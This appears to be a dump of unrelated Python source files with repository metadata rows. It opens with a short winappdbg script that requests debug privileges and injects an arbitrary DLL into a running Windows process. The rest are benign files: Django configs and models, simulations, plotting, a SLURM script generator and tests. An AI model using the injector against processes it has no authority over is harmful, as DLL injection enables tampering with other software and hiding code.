# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import os
import sys
from winappdbg import Process, System, HexInput
def main():
print "Process DLL injector"
print "by Mario Vilas (mvilas at gmail.com)"
print
if len(sys.argv) != 3:
script = os.path.basename(sys.argv[0])
print "Injects a DLL into a running process."
print " %s <pid> <library.dll>" % script
print " %s <process.exe> <library.dll>" % script
return
System.request_debug_privileges()
try:
pid = HexInput.integer(sys.argv[1])
except Exception:
s = System()
s.scan_processes()
pl = s.find_processes_by_filename(sys.argv[1])
if not pl:
print "Process not found: %s" % sys.argv[1]
return
if len(pl) > 1:
print "Multiple processes found for %s" % sys.argv[1]
for p,n in pl:
print "\t%12d: %s" % (p,n)
return
pid = pl[0][0].get_pid()
print "Using PID %d (0x%x)" % (pid, pid)
dll = sys.argv[2]
print "Using DLL %s" % dll
p = Process(pid)
b = p.get_bits()
if b != System.bits:
print (
"Cannot inject into a %d bit process from a %d bit Python VM!"
% (b, System.bits)
)
return
p.scan_modules()
p.inject_dll(dll)
if __name__ == '__main__':
try:
import psyco
psyco.bind(main)
except ImportError:
pass
main()
| [
"mvilas@gmail.com"
] | mvilas@gmail.com |
b634f92f48233fa93f99b45521e9ff384f0ae8cf | abaa004b41f63aa489be12a6e4be8f92ef2ef6d3 | /csvfetch/csvfetch/asgi.py | 10359ee6cee1be3538ccdfe026ad2c360aa606c2 | [] | no_license | vshaladhav97/django_practise_projects | 30dcc8dd909626c1d624d9c5895fc90ad55c79d0 | 83455c50e2ee910f03db47fbe1420d1cbd7eb292 | refs/heads/master | 2023-03-28T14:08:08.244694 | 2021-03-26T03:56:56 | 2021-03-26T03:56:56 | 351,655,547 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | """
ASGI config for csvfetch project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'csvfetch.settings')
application = get_asgi_application()
| [
"adhavv0@gmail.com"
] | adhavv0@gmail.com |
db4906b126e1ee3ff257b3bb20c776ab64d9a31b | 90ec9a009d84dd7eebbd93de4f4b9de553326a39 | /app/config/enums.py | a558f22c18fe955f066b40058f21e00a46fa4fc0 | [] | no_license | alexiuasse/NipponArDjango | 18a86bb108b9d72b36c8adf7c4344398cc4ca6b2 | ddc541a8d7e4428bde63c56f44354d6f82e0f40d | refs/heads/master | 2023-08-03T12:16:56.431870 | 2021-07-15T23:43:33 | 2021-07-15T23:43:33 | 278,093,323 | 0 | 0 | null | 2021-09-22T20:04:15 | 2020-07-08T13:13:22 | CSS | UTF-8 | Python | false | false | 391 | py | # Created by Alex Matos Iuasse.
# Copyright (c) 2020. All rights reserved.
# Last modified 10/08/2020 10:14.
from enum import Enum
class ContextualEnum(Enum):
VERDE = "success"
AZUL = "primary"
CIANO = "info"
AMARELO = "warning"
VERMELHO = "danger"
CINZA = "default"
@classmethod
def choices(cls):
return [(key.value, key.name) for key in cls]
| [
"alexiuasse@gmail.com"
] | alexiuasse@gmail.com |
8c91a1c95584126d62eb15a000e7d8c552c05140 | 60aee65d7d40f2886a4c15e08e50f145c809aff6 | /experiment/Keras Machine Learning Model/function/imgCrop.py | 419986e7616c7aa5477d0e5bd51844dd9b815006 | [] | no_license | tshahria/DreamCatcher | 2fdabd90add46eb86a20fe1aa1b5bb4d4a58ddb1 | 3880b120f8ed857462d565fbf48d320076bff73a | refs/heads/master | 2021-05-06T10:19:18.634656 | 2017-12-08T20:31:44 | 2017-12-08T20:31:44 | 114,164,133 | 0 | 1 | null | 2017-12-13T20:09:44 | 2017-12-13T20:09:43 | null | UTF-8 | Python | false | false | 2,849 | py | import sys
from PIL import Image, ImageDraw
try:
import cv2 as cv
except ImportError:
print('Could not import cv, trying opencv')
import opencv.cv as cv
def main():
source_image = Image.open('function/ppl.jpg')
source_width, source_height = source_image.size
print('Image is {}x{}'.format(source_width, source_height))
target_width = 1000
target_height = 200
# Make image a reasonable size to work with. Using the source_height will
# make sure it's just resized to the target_width
source_image.thumbnail((target_width, source_height), Image.ANTIALIAS)
# Find the faces and show us where they are
faces = faces_from_pil_image(source_image)
faces_found_image = draw_faces(source_image, faces)
faces_found_image.show()
# Get details about where the faces are so we can crop
top_of_faces = top_face_top(faces)
bottom_of_faces = bottom_face_bottom(faces)
all_faces_height = bottom_of_faces - top_of_faces
print('Faces are {} pixels high'.format(all_faces_height))
if all_faces_height >= target_width:
print('Faces take up more than the final image, you need better logic')
exit_code = 1
else:
# Figure out where to crop and show the results
face_buffer = 0.5 * (target_height - all_faces_height)
top_of_crop = int(top_of_faces - face_buffer)
coords = (0, top_of_crop, target_width, top_of_crop + target_height)
print('Cropping to', coords)
final_image = source_image.crop(coords)
final_image.show()
exit_code = 0
return exit_code
def faces_from_pil_image(pil_image):
"Return a list of (x,y,h,w) tuples for faces detected in the PIL image"
storage = cv.CreateMemStorage(0)
facial_features = cv.Load('haarcascade_frontalface_alt.xml', storage=storage)
cv_im = cv.CreateImageHeader(pil_image.size, cv.IPL_DEPTH_8U, 3)
cv.SetData(cv_im, pil_image.tostring())
faces = cv.HaarDetectObjects(cv_im, facial_features, storage)
# faces includes a `neighbors` field that we aren't going to use here
return [f[0] for f in faces]
def top_face_top(faces):
coords = [f[1] for f in faces]
# Top left corner is 0,0 so we need the min for highest face
return min(coords)
def bottom_face_bottom(faces):
# Top left corner is 0,0 so we need the max for lowest face. Also add the
# height of the faces so that we get the bottom of it
coords = [f[1] + f[3] for f in faces]
return max(coords)
def draw_faces(image_, faces):
"Draw a rectangle around each face discovered"
image = image_.copy()
drawable = ImageDraw.Draw(image)
for x, y, w, h in faces:
absolute_coords = (x, y, x + w, y + h)
drawable.rectangle(absolute_coords)
return image
if __name__ == '__main__':
sys.exit(main()) | [
"jeffreykam0415@gmail.com"
] | jeffreykam0415@gmail.com |
dfb78191a7e2e45e05ba8a63e31ddffa103108f6 | 504efba4ab5ba1721ab3388144b16fa5f24833e7 | /07_Chroma_Scan_SC_NoRF/01_05/Make_SLURM_submission_script.py | 884a2e4ed4160053f6c9bacba40ba1044ad8a6a7 | [
"MIT"
] | permissive | HaroonRafique/PS_Transfer | b568fe41c98357877c3bc63b2ca89f8724439da0 | 59ed8a0978ba4699f34c9f7a2500e0026759a2b6 | refs/heads/master | 2023-05-25T21:13:36.586605 | 2020-07-10T07:41:40 | 2020-07-10T07:41:40 | 213,405,455 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,317 | py | #!/usr/bin/env python
# Python script to create a SLURM submission script for PyORBIT
# 21 March 2019 Haroon Rafique CERN BE-ABP-HSI
import os
#-----------------------------------------------------------------------
# SETTINGS
#-----------------------------------------------------------------------
script_name = "SLURM_submission_script.sh"
# Switches
hyperthreading = False # Enable hyperthreading
exclusive = True # Exclusive (see SLURM documentation)
autotime = True # 2 days for short queues, 2 weeks for long queues
autotask = True # Automatically set nodes to maximum tasks
clean_all = True # Clean simulation folder before running (False when resuming pickle checkpoint)
# Must be chosen
# ~ queue = 'inf-long', 'inf-short', 'batch-long', 'batch-short'
queue = 'batch-short'
n_nodes = 2
jobname = '05_01_05'
path_to_simulation = os.path.dirname(os.path.realpath(__file__)) # This directory
# Optional - have to use with correct switches
manual_time = '504:00:00' # manually set using format 'hours:minutes:seconds'
manual_tasks = 40 # manually change ntasks
# Defaults - can be changed
output_file_name = 'slurm.%N.%j.out'
error_file_name = 'slurm.%N.%j.err'
root_dir = '/hpcscratch/user/harafiqu'
simulation_file = 'pyOrbit.py'
#-----------------------------------------------------------------------
# AUTOMATICALLY FORMAT SCRIPT
#-----------------------------------------------------------------------
n_tasks = 0
if autotask:
if hyperthreading:
if 'batch' in queue: n_tasks = 32
elif 'inf' in queue: n_tasks = 40
else:
print 'queue not recognised'
exit(0)
else:
if 'batch' in queue: n_tasks = 16
elif 'inf' in queue: n_tasks = 20
else:
print 'queue not recognised'
exit(0)
else: n_tasks = manual_tasks
time = '48:00:00'
if autotime:
if queue == 'batch-short': time = '48:00:00'
elif queue == 'inf-short': time = '120:00:00'
elif queue == 'inf-long' or 'batch-long': time = '504:00:00'
else:
print 'queue not recognised'
exit(0)
else: time = manual_time
#-----------------------------------------------------------------------
# WRITE FILE
#-----------------------------------------------------------------------
if os.path.exists(script_name):
print 'SLURM submission script ' + script_name + ' already exists. Deleting'
os.remove(script_name)
print "Creating ", script_name
f= open(script_name,"w")
f.write('#!/bin/bash')
f.write('\n#SBATCH --job-name=' + str(jobname))
f.write('\n#SBATCH --output=' + str(output_file_name))
f.write('\n#SBATCH --error=' + str(error_file_name))
f.write('\n#SBATCH --nodes=' + str(n_nodes))
f.write('\n#SBATCH --ntasks-per-node=' + str(n_tasks))
f.write('\n#SBATCH --partition=' + str(queue))
f.write('\n#SBATCH --time=' + str(time))
f.write('\n#SBATCH --mem-per-cpu=3200M')
if (exclusive): f.write('\n#SBATCH --exclusive')
if not hyperthreading: f.write('\n#SBATCH --hint=nomultithread')
f.write('\n')
f.write('\nBATCH_ROOT_DIR=' + str(root_dir))
f.write('\nRUN_DIR=' + str(path_to_simulation))
f.write('\nOrigIwd=$(pwd)')
f.write('\n')
f.write('\n# Make an output folder in the root directory to hold SLURM info file')
f.write('\ncd ${BATCH_ROOT_DIR}')
f.write('\noutput_dir="output"')
f.write('\nmkdir -p $output_dir')
f.write('\n')
f.write('\n# Fill the SLURM info file')
f.write('\nsimulation_info_file="${BATCH_ROOT_DIR}/${output_dir}/simulation_info_${SLURM_JOB_ID}.${SLURM_NODEID}.${SLURM_PROCID}.txt"')
f.write('\necho "PyOrbit path: `readlink -f ${ORBIT_ROOT}`" >> ${simulation_info_file}')
f.write('\necho "Run path: `readlink -f ${RUN_DIR}`" >> ${simulation_info_file}')
f.write('\necho "Submit host: `readlink -f ${SLURM_SUBMIT_HOST}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Job name: `readlink -f ${SLURM_JOB_NAME}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Job ID: `readlink -f ${SLURM_JOB_ID}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Nodes allocated: `readlink -f ${SLURM_JOB_NUM_NODES}`" >> ${simulation_info_file}')
f.write('\necho "SLURM CPUS per Node: `readlink -f ${SLURM_CPUS_ON_NODE}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Node ID: `readlink -f ${SLURM_NODEID}`" >> ${simulation_info_file}')
f.write('\necho "SLURM total cores for job: `readlink -f ${SLURM_NTASKS}`" >> ${simulation_info_file}')
f.write('\necho "SLURM process ID: `readlink -f ${SLURM_PROCID}`" >> ${simulation_info_file}')
f.write('\necho "****************************************" >> ${simulation_info_file}')
f.write('\n')
f.write('\n# Enter job directory, clean it, and setup environment -> SLURM info file')
f.write('\ncd ${RUN_DIR}')
if clean_all:f.write('\n./clean_all.sh')
f.write('\n. setup_environment.sh >> ${simulation_info_file}')
f.write('\n')
f.write('\n# Load correct MPI')
f.write('\nmodule load mpi/mvapich2/2.3')
f.write('\n')
f.write('\ntstart=$(date +%s)')
f.write('\n')
f.write('\n# Run the job')
if hyperthreading:f.write('\nsrun ${ORBIT_ROOT}/bin/pyORBIT ${RUN_DIR}/' + str(simulation_file))
else:f.write('\nsrun --hint=nomultithread ${ORBIT_ROOT}/bin/pyORBIT ${RUN_DIR}/' + str(simulation_file))
f.write('\n')
f.write('\ntend=$(date +%s)')
f.write('\ndt=$(($tend - $tstart))')
f.write('\necho "total simulation time (s): " $dt >> ${simulation_info_file}')
f.close()
print 'SLURM submission script creation finished'
| [
"haroon.rafique@protonmail.com"
] | haroon.rafique@protonmail.com |
470279f1566f761e2fe269c7fa4a6b4f68c48f35 | 060ce17de7b5cdbd5f7064d1fceb4ded17a23649 | /fn_aws_utilities/tests/test_funct_fn_get_step_function_execution.py | 69e85aa6d5a7b8b7d1d865e924e6b6f2ada73d71 | [
"MIT"
] | permissive | ibmresilient/resilient-community-apps | 74bbd770062a22801cef585d4415c29cbb4d34e2 | 6878c78b94eeca407998a41ce8db2cc00f2b6758 | refs/heads/main | 2023-06-26T20:47:15.059297 | 2023-06-23T16:33:58 | 2023-06-23T16:33:58 | 101,410,006 | 81 | 107 | MIT | 2023-03-29T20:40:31 | 2017-08-25T14:07:33 | Python | UTF-8 | Python | false | false | 3,073 | py | # -*- coding: utf-8 -*-
"""Tests using pytest_resilient_circuits"""
import fn_aws_utilities
from mock import patch
import pytest
from resilient_circuits.util import get_config_data, get_function_definition
from resilient_circuits import SubmitTestFunction, FunctionResult
from .mock_artifacts import mock_constants, mocked_aws_step_function
PACKAGE_NAME = "fn_aws_utilities"
FUNCTION_NAME = "fn_get_step_function_execution"
# Read the default configuration-data section from the package
config_data = get_config_data(PACKAGE_NAME)
# Provide a simulation of the Resilient REST API (uncomment to connect to a real appliance)
resilient_mock = "pytest_resilient_circuits.BasicResilientMock"
def call_fn_get_step_function_execution_function(circuits, function_params, timeout=5):
# Create the submitTestFunction event
evt = SubmitTestFunction("fn_get_step_function_execution", function_params)
# Fire a message to the function
circuits.manager.fire(evt)
# circuits will fire an "exception" event if an exception is raised in the FunctionComponent
# return this exception if it is raised
exception_event = circuits.watcher.wait("exception", parent=None, timeout=timeout)
if exception_event is not False:
exception = exception_event.args[1]
raise exception
# else return the FunctionComponent's results
else:
event = circuits.watcher.wait("fn_get_step_function_execution_result", parent=evt, timeout=timeout)
assert event
assert isinstance(event.kwargs["result"], FunctionResult)
pytest.wait_for(event, "complete", True)
return event.kwargs["result"].value
class TestFnGetStepFunctionExecution:
""" Tests for the fn_get_step_function_execution function"""
def test_function_definition(self):
""" Test that the package provides customization_data that defines the function """
func = get_function_definition(PACKAGE_NAME, FUNCTION_NAME)
assert func is not None
mock_inputs_1 = {
"execution_arn": "0000"
}
expected_results_1 = {
"startDate": mock_constants.get("DATE_TIME_MOCK_OBJ").strftime("%Y-%m-%d %H:%M:%S"),
"stopDate": mock_constants.get("DATE_TIME_MOCK_OBJ").strftime("%Y-%m-%d %H:%M:%S")
}
mock_inputs_2 = {
"execution_arn": "1111"
}
expected_results_2 = {
"startDate": mock_constants.get("DATE_TIME_MOCK_OBJ").strftime("%Y-%m-%d %H:%M:%S"),
"stopDate": None
}
@patch("fn_aws_utilities.components.fn_get_step_function_execution.AwsStepFunction", side_effect=mocked_aws_step_function)
@pytest.mark.parametrize("mock_inputs, expected_results", [
(mock_inputs_1, expected_results_1),
(mock_inputs_2, expected_results_2)
])
def test_success(self, mock_aws_step_function, circuits_app, mock_inputs, expected_results):
""" Test calling with sample values for the parameters """
results = call_fn_get_step_function_execution_function(circuits_app, mock_inputs)
assert(expected_results == results)
| [
"travis@example.org"
] | travis@example.org |
08a1e71a298632f21bbaf6a642b26963207b28c4 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2234/60636/265682.py | 7f5892bbcb14ddbeb52302932a7f2c3a611488fa | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,292 | py | from itertools import combinations
n=int(input())
p=int(input())
jiandie=[]
starts=[]
for i in range(n):
jiandie.append(0)
for i in range(p):
x=input().split(" ")
starts.append(int(x[0])-1)
jiandie[int(x[0])-1]=int(x[1])
r=int(input())
sources=[]
for i in range(n):
source=[]
for j in range(n):
source.append("0")
sources.append(source)
for i in range(r):
x=input().split(" ")
sources[int(x[0])-1][int(x[1])-1]="1"
YES=[]
NO=[]
res=[]
for i in range(len(starts)):
target=[]
target.append(starts[i])
ans=[]
while(len(target)):
x=target.copy()
for a in target:
x.pop(x.index(a))
if not a in ans:
ans.append(a)
for j in range(len(sources[a])):
if sources[a][j]=="1":
if not j in ans and not j in x:
x.append(j)
target=x
res.append(ans)
targets=[]
targets.append(res[0])
res.pop(0)
for i in res:
alls=[]
for j in targets:
if not j in alls:
alls.append(j)
for j in i:
if not j in alls:
targets.append(j)
print(targets)
| [
"1069583789@qq.com"
] | 1069583789@qq.com |
cdfe3f9d3039f42e476a4efec7a3cb47ff8b2c02 | b00840e56173dc2a196442bd354b9e3cc13b17df | /code_fargo/tutorial/compareMigrationRates.py | 55fbadae5550691b2f011813952e4c8a78bbc715 | [] | no_license | Sportsfan77777/vortex | 56c28fb760f6c98de4a7c8fdcf1168d78b4e57af | 780ec14937d1b79e91a367d58f75adc905b8eef2 | refs/heads/master | 2023-08-31T02:50:09.454230 | 2023-08-24T10:55:05 | 2023-08-24T10:55:05 | 41,785,163 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,181 | py | """
plots torque over time
*** uses a smoothing function ***
"""
import sys
import os
import subprocess
import pickle
import numpy as np
from matplotlib import pyplot as plot
from matplotlib import rcParams as rc
from scipy import signal as sig
from scipy.ndimage import filters as ff
import util
## Choose directories ##
directories = ["earth1", "earth4", "earth16", "jupiter2", "jupiter1", "saturn1", "saturn-half"]
###############################################################################
## Set file names ##
orbit_fn = "orbit0.dat"
# Smoothing Function
smooth = lambda array, kernel_size : ff.gaussian_filter(array, kernel_size, mode = 'nearest') # smoothing filter
# Plot Parameters
kernel_size = 20
colors = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728',
'#9467bd', '#8c564b', '#e377c2', '#7f7f7f',
'#bcbd22', '#17becf']
fontsize = 14
linewidth = 3
start_time = 10 # start time
end_time = 95 # end time
def add_track(directory, index):
fn = "../%s/%s" % (directory, orbit_fn)
data = np.loadtxt(fn)
times = data[:, 0] / (2 * np.pi) # Convert to orbital times
sm_axes = data[:, 2] # Planet Semi-Major Axis
dt = times[1] - times[0] # Note: output is constant
smoothed_sm_axes = smooth(sm_axes, kernel_size)
migration_rates = -(np.diff(smoothed_sm_axes) / dt) / smoothed_sm_axes[:-1] # -(da/dt) / a
start = np.searchsorted(times, start_time)
end = np.searchsorted(times, end_time)
xs = times[start : end]; ys = migration_rates[start : end]
plot.plot(xs, ys, linewidth = linewidth, label = directory, c = colors[index])
def make_plot():
# Curves
for i, directory in enumerate(directories):
add_track(directory, i)
# Annotate
plot.title("Migration Rates", fontsize = fontsize + 2)
plot.xlabel(r"$t$", fontsize = fontsize)
plot.ylabel(r"$-\frac{1}{a} \frac{da}{dt}$", fontsize = fontsize)
plot.legend(loc = "upper right")
# Limits
plot.xlim(0, 1.5 * end_time)
#plot.ylim(min_y, max_y)
# Save and Close
plot.savefig("migrationRateComparison.png", bbox_inches = 'tight')
plot.show()
plot.cla()
### PLOTTING ###
make_plot()
| [
"mhammer44444@gmail.com"
] | mhammer44444@gmail.com |
c83f3d3773151f469f78e72a467dd0805bf68c6e | eb40da8906c1a03a22c4c6e2a9eb09ea8f87953c | /api/areas/areas.py | daebbec8e355ce5917c4d364ebeaa1884fad0515 | [
"MIT"
] | permissive | ufosoftwarellc/cannlytics | 677d149f64ee165c2e2adc0f3f39e618c3b2cc10 | 236bd597e30530666400fef6dceaae6de6aa587b | refs/heads/main | 2023-06-02T02:09:01.425087 | 2021-06-19T06:41:12 | 2021-06-19T06:41:12 | 377,613,147 | 0 | 0 | MIT | 2021-06-16T20:00:49 | 2021-06-16T20:00:48 | null | UTF-8 | Python | false | false | 3,025 | py | """
Areas Endpoints | Cannlytics API
Created: 5/8/2021
Updated: 5/8/2021
API endpoints to interface with areas.
"""
# External imports
from rest_framework import status
from rest_framework.decorators import api_view
from rest_framework.response import Response
# Internal imports
from api.auth import auth
@api_view(['GET', 'POST', 'DELETE'])
def areas(request, format=None):
"""Get or update information about a areas / locations."""
# Authenticate the user.
claims = auth.verify_session(request)
uid = claims['uid']
if request.method == 'GET':
org_id = ''
ref = '/organizations/%s/areas'
# TODO: If no organization is specified, get the user's
# organizations and get all areas for all licenses.
# IF the organization is specified, get all areas for all
# licenses of the organization.
# If the organization and license is specified, get all areas
# for the given organization's license.
# If a specific area ID is given, get only that area.
# If a filter parameter is given, then return only the areas
# that match the query.
# limit = request.query_params.get('limit', None)
# order_by = request.query_params.get('order_by', 'state')
# data = get_collection(ref, order_by=order_by, limit=limit, filters=[])
# Optional: If a user is using traceability, then is there any
# need to get location data from the API, or is the data in
# Firestore sufficient (given Firestore is syncing with Metrc).
# Otherwise, initialize a Metrc client and get areas from Metrc.
# traced_location = cultivator.get_locations(uid=cultivation_uid)
# # Optional: Get any filters from dict(request.query_params)
return Response([{'make': "Subaru", 'model': "WRX", 'price': 21000}])
elif request.method == 'POST':
# TODO: Either create or update the area.
# # Create a new location using: POST /locations/v1/create
# cultivation_name = 'MediGrow'
# cultivation_original_name = 'medi grow'
# cultivator.create_locations([
# cultivation_original_name,
# 'Harvest Location',
# 'Plant Location',
# 'Warehouse',
# ])
# # Get created location
# cultivation= None
# locations = track.get_locations(action='active', license_number=cultivator.license_number)
# for location in locations:
# if location.name == cultivation_original_name:
# cultivation = location
# # Update the name of the location using: POST /locations/v1/update
# cultivator.update_locations([cultivation.uid], [cultivation_name])
return Response({'data': []})
elif request.method == 'DELETE':
# TODO: Archive the area data and delete from Metrc.
return Response({'data': []}) | [
"keeganskeate@gmail.com"
] | keeganskeate@gmail.com |
4566d265de8c9de17ff705716fb33d9a946acd40 | 255e19ddc1bcde0d3d4fe70e01cec9bb724979c9 | /dockerized-gists/2632280/snippet.py | 2c3e53153055035e65c3c069b7b509579d65212b | [
"MIT"
] | permissive | gistable/gistable | 26c1e909928ec463026811f69b61619b62f14721 | 665d39a2bd82543d5196555f0801ef8fd4a3ee48 | refs/heads/master | 2023-02-17T21:33:55.558398 | 2023-02-11T18:20:10 | 2023-02-11T18:20:10 | 119,861,038 | 76 | 19 | null | 2020-07-26T03:14:55 | 2018-02-01T16:19:24 | Python | UTF-8 | Python | false | false | 2,057 | py | #!/usr/bin/python
#
import sys
import os
import copy
import random
deck = [1,2,3,4,5,6,7,8,9,0,0,0,0]
deck = [1,2,3,4,5,6,7,8,9,0,0,0,0]
results = {
'bank': 0,
'player': 0,
'tie': 0,
}
def generate_deck(n=1):
decks = deck * 4 * n
random.shuffle(decks)
return decks
def simulate_game(decks):
player = [decks.pop()]
bank = [decks.pop()]
player.append(decks.pop())
bank.append(decks.pop())
player_score = sum(player) % 10
bank_score = sum(bank) % 10
if player_score >= 8 or bank_score >= 8:
if player_score > bank_score:
return 'player'
elif bank_score > player_score:
return 'bank'
else:
return 'tie'
# player draws 3rd card
if player_score <= 5:
pcard = decks.pop()
player.append(pcard)
# bank rules
if pcard in (2,3) and bank_score <= 4:
bank.append(decks.pop())
elif pcard in (4,5) and bank_score <= 5:
bank.append(decks.pop())
elif pcard in (6,7) and bank_score <= 6:
bank.append(decks.pop())
elif pcard == 8 and bank_score <= 2:
bank.append(decks.pop())
elif pcard in (1,9,0) and bank_score <= 3:
bank.append(decks.pop())
elif bank_score <= 5:
bank.append(decks.pop())
player_score = sum(player) % 10
bank_score = sum(bank) % 10
if player_score == bank_score:
return 'tie'
return 'player' if player_score > bank_score else 'bank'
def main():
for i in range(3000):
# 3000 game / 8 decks of cards each
decks = generate_deck(8)
while len(decks) > 10:
winner = simulate_game(decks)
results[winner] += 1
total = results['player'] + results['bank'] + results['tie']
print "Baccarat probabilties"
print 'P(win|player)', results['player'] / float(total)
print 'P(win|bank) ', results['bank'] / float(total)
print 'P(tie) ', results['tie'] / float(total)
if __name__=="__main__":
main()
| [
"gistshub@gmail.com"
] | gistshub@gmail.com |
40ad77e61a4e82b015bf0da7e66515953ad9eed4 | 2b5fd9d436a97726f852a12bab58b8d367f4866a | /apps/CMDB/model/oracle_modles.py | 85cecdfda15e7e6ac6002550d0218e5453001bc2 | [] | no_license | lxlzyf/roe | 07ff551b142c0411acb7ca6f759ea98b40ad9b72 | 2d7f1b01e2456875d14a75c90d8397965215bcd3 | refs/heads/master | 2020-03-27T06:00:43.587235 | 2018-08-20T10:47:47 | 2018-08-20T10:47:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,361 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from CMDB.model.yewutree_model import YewuTree
from django.contrib.auth.models import User
#群,一定属于某一个产品线,可能属于多个组,一个节点也是群
class OracleCluster(models.Model):
arch = (
(u"主从", u"主从"),
(u"单机", u"单击"),
(u"rac", u"rac"),
(u"rac+从库", u"rac+从库")
)
name = models.CharField(u"集群名", max_length=30, blank=True,null=True)
arch = models.CharField(verbose_name=u"集群架构", choices=arch, max_length=30, null=True, blank=True)
db_version = models.CharField(verbose_name=u"数据库版本", max_length=30, null=True, blank=True)
defaultdb=models.CharField(verbose_name=u"主用DB", max_length=30, null=True, blank=True)
tree_id=models.ForeignKey(YewuTree,verbose_name=u"所属产品线", on_delete=models.SET_NULL, null=True, blank=True)
desc = models.CharField(u"描述", max_length=100, null=True, blank=True)
operator = models.ManyToManyField(User, verbose_name="可见的人", blank=True)
def __unicode__(self):
return self.name
class Meta:
db_table = 'Oracle_Cluster'
verbose_name = 'Oracle 集群'
verbose_name_plural = 'Oracle集群'
# 按照用户来划分产品线
class OracleUser(models.Model):
db_user = models.CharField(max_length=30, null=True,blank=True)
db_password=models.CharField(max_length=60, null=True,blank=True)
privlige=models.CharField(verbose_name='权限',max_length=400, null=True,blank=True)
dbcluster = models.ForeignKey(OracleCluster,verbose_name=u"所属集群", on_delete=models.SET_NULL, null=True, blank=True)
def __unicode__(self):
return self.db_user
class Meta:
db_table = 'Oracle_User'
verbose_name = 'Oracle用户'
verbose_name_plural = 'Oracle用户'
#数据库中的 DB,表空间信息
class Oracletablespace(models.Model):
tablespace_name = models.CharField(max_length=50,verbose_name=u"表空间名")
dbcluster = models.ForeignKey(OracleCluster,verbose_name=u"所属集群", on_delete=models.SET_NULL, null=True, blank=True)
tablespace_size=models.CharField(max_length=50,verbose_name=u"库大小")
def __unicode__(self):
return u'%s ' % ( self.tablespace_name)
class Meta:
db_table = 'Oracle_Tablespace'
verbose_name = 'Oracle 表空间'
verbose_name_plural = 'Oracle表空间'
#ORACLE 实例表。配置信息慢慢添加
class Oracle_Instance(models.Model):
DB_ROLE = (
(u"单库", u"单库"),
(u"主库", u"主库"),
(u"从库", u"从库"),
(u"汇总", u"汇总")
)
DB_STATUS = (
(u"使用中", u"使用中"),
(u"未使用", u"未使用"),
(u"故障", u"故障"),
(u"其它", u"其它"),
)
dbtag = models.CharField(max_length=50, verbose_name=u"数据库标志", blank=True,null=True)
vist_ip = models.GenericIPAddressField(verbose_name=u"访问VIP", max_length=15)
m_ip = models.GenericIPAddressField(verbose_name=u"管理IP", max_length=15)
other_ip= models.CharField(max_length=150, verbose_name=u"其他IP,逗号隔开")
port = models.IntegerField(verbose_name=u"端口",default=1521)
sid = models.CharField(verbose_name=u"SID", max_length=8,blank=True,null=True)
idc = models.CharField(verbose_name=u"机房", max_length=18,blank=True,null=True)
CLUSTER = models.ForeignKey(OracleCluster, verbose_name=u"所属集群", on_delete=models.SET_NULL, null=True, blank=True)
role = models.CharField(verbose_name=u"DB角色", choices=DB_ROLE, max_length=30, null=True, blank=True)
db_status = models.CharField(verbose_name=u"DB状态", choices=DB_STATUS, max_length=30, null=True, blank=True)
memory = models.CharField(u"分配内存", max_length=30, null=True, blank=True)
disk = models.CharField(u"磁盘位置", max_length=200, null=True, blank=True)
memo = models.TextField(u"备注信息", max_length=200, null=True, blank=True)
def __unicode__(self):
return self.dbtag
class Meta:
db_table = 'Oracle_Instance'
verbose_name = 'Oracle集群一个实例'
verbose_name_plural = 'Oracle集群一个实例' | [
"flc009@163.com"
] | flc009@163.com |
3a349a33e9e4531c9a6cddd12c53e9f0b04d76cf | e592f12040848bedbe6ffe309cceb757366d1887 | /Spotify_main.py | caf867bcdd3b05c8dbc58e7780a1c9cffd8349ef | [] | no_license | Hadryan/Spotify_music_recommender-1 | 02a3f0e1b8545f99643bbc9ee72dd2869366d5c1 | dcaf6a518c29f7c12062fc7bc8e143d8edc9d588 | refs/heads/main | 2023-03-05T21:49:59.022693 | 2021-02-10T05:18:32 | 2021-02-10T05:18:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,582 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Feb 8 15:43:03 2021
@author: Victor
"""
import Spotify_Authorization
import spotipy
import pandas as pd
class Spotify_app():
def __init__(self):
self.auth = Spotify_Authorization.auth()
self.spotify = spotipy.Spotify(auth_manager=self.auth)
self.ids = []
self.artists = []
self.explicit = []
self.name = []
self.pop = []
self.rel_date = []
def clean_lists(self):
self.ids.clear()
self.artists.clear()
